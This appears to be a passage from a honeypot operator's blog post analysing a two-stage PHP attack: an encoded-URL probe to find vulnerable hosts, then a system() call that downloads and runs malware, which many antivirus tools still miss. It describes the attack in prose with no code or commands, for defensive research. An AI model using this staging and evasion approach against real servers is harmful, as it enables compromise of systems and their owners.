If you want to read the full data of my analyse I would like to point you to the pdf on this attack
But now to the other side of the story. By using my other/old honeypot I had not the feature of succesful attacks. Means, they always respond in two ways
- Random Data (like artillery)
- unsuccessful "40x" (like Beeswarm and Apache)
Two stage compromise attacksThe attack described within the other post had two stages.
- PHP related encoded url
- PHP system() call to download and execute the malicous code
Stage 1, is only used to find a target which is vulnerable. So I do not spread my code into the wild, or the hand of a researcher without being sure it would work.
A good indicator for this theory is, that although the malware was written in 2008 and repacked in 2014, many Anti-Virus solutions does not detect it and even Virustotal does not report the download side as malicous.